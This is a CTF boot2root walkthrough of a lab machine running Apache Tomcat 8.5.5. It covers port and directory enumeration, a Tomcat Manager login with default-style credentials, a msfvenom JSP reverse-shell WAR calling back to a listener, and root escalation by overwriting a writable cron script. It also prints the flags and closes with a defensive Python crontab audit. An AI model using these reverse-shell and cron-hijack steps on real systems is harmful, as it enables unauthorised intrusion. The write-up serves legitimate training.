This challenge is a boot2root machine for FIT and BSides Guatemala CTF.
Started by performing a basic port scan to identify open services:
nmap -sC -sV -p- 10.10.10.10
Discovered the following open ports:
Performed directory and file enumeration:
gobuster dir -u http://10.10.10.10:8080 -w /usr/share/wordlists/dirb/common.txt
Discovered the following directories and files:
Checked gobuster results with curl to investigate the manager endpoint:
curl -i http://10.10.10.10:8080/manager/html
Discovered the following response details:
The web application was running Apache Tomcat/8.5.5. Searched for vulnerabilities specific to this version.
Identified the Apache Tomcat AJP File Read vulnerability (Ghostcat, CVE-2020-1938).
Note: Used the found credentials to access the Tomcat Manager and deployed a malicious WAR file using Metasploit and msfvenom.
Created a JSP reverse shell in a WAR file using msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.9.0.54 LPORT=4444 -f war -o shell.war
Opened a listener in Metasploit:
msfconsole
use multi/handler
set payload java/jsp_shell_reverse_tcp
set LHOST 10.9.0.54
set LPORT 4444
run
Logged into the Tomcat Manager using credentials (tomcat:s3cret), uploaded shell.war, which automatically deployed to the server.
Navigated to /shell in the applications list to trigger the reverse shell.
Received a reverse shell in Metasploit:
sessions
sessions -i 1
Verified access:
whoami
id
ls -la
Located the user flag in /home/jack/user.txt:
cat /home/jack/user.txt
User Flag:
39400c90bc683a41a8935e4719f181bf
Identified a cron job running as root every minute, executing /home/jack/id.sh.
cat /home/jack/id.sh
#!/bin/bash
id > test.txt
The script was writable. Modified it to read the root flag:
printf '#!/bin/bash\ncat /root/root.txt > test.txt\n' > /home/jack/id.sh
(printf expands the \n in every shell; bash's builtin echo would write it literally and leave the script as a single unusable line.)
Waited for the cron job to execute, since it runs every minute.
Checked test.txt for the flag.
cat test.txt
Root Flag:
d89d5391984c0450a95497153ae7ca3a
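As an added example that is not part of the original writeup, a small Python audit that walks an /etc/crontab-style listing and reports root-run entries whose script a non-root user could modify, which is the weakness used for the privilege escalation above. The crontab text, file paths and modes are constructed inside run_demo(), so it reads no system files.

```python
import os
import stat
import tempfile

def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab-style lines; comments and VAR=value lines are skipped."""
    for line in text.splitlines():
        fields = line.strip().split(None, 6)  # five time fields, user, command
        if len(fields) == 7 and not fields[0].startswith("#"):
            yield fields[5], fields[6]

def script_path(command):
    """The script a cron command runs: its first token, or the token after an interpreter."""
    tokens = command.split()
    if tokens and os.path.basename(tokens[0]) in {"sh", "bash", "dash", "python3", "perl"}:
        tokens = tokens[1:]
    return tokens[0] if tokens else None

def insecure_reasons(path, expected_uid):
    """Why a root-run script could be modified by an unprivileged user (empty if it cannot)."""
    reasons, st = [], os.stat(path)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("file is group/world-writable")
    if st.st_uid != expected_uid:
        reasons.append("file not owned by the expected uid")
    parent = os.stat(os.path.dirname(path)).st_mode
    if parent & (stat.S_IWGRP | stat.S_IWOTH) and not parent & stat.S_ISVTX:
        reasons.append("directory is writable, so the script can be replaced")
    return reasons

def audit_crontab(text, expected_uid=0):
    """Return (user, script, reasons) for each entry whose script a non-root user could change."""
    findings = []
    for user, command in parse_system_crontab(text):
        path = script_path(command)
        if path and os.path.isabs(path) and os.path.isfile(path):
            reasons = insecure_reasons(path, expected_uid)
            if reasons:
                findings.append((user, path, reasons))
    return findings

def run_demo():
    """Audit a constructed crontab over two temp scripts; id.sh mimics the writable one in the writeup."""
    workdir = tempfile.mkdtemp()  # created mode 0700, so the directory check stays quiet
    loose, tight = os.path.join(workdir, "id.sh"), os.path.join(workdir, "backup.sh")
    for path, mode in ((loose, 0o777), (tight, 0o755)):
        open(path, "w").write("#!/bin/bash\nid > test.txt\n")
        os.chmod(path, mode)  # 0o777: anyone on the box can edit what root will run
    crontab = f"# m h dom mon dow user command\n* * * * * root {loose}\n0 3 * * * root /bin/bash {tight}\n"
    return audit_crontab(crontab, expected_uid=os.getuid())  # our uid, so ownership alone is not flagged
```

Run against the real /etc/crontab and /etc/cron.d/* with the default expected_uid=0, a finding on a root entry means the same cron-based escalation shown above is possible.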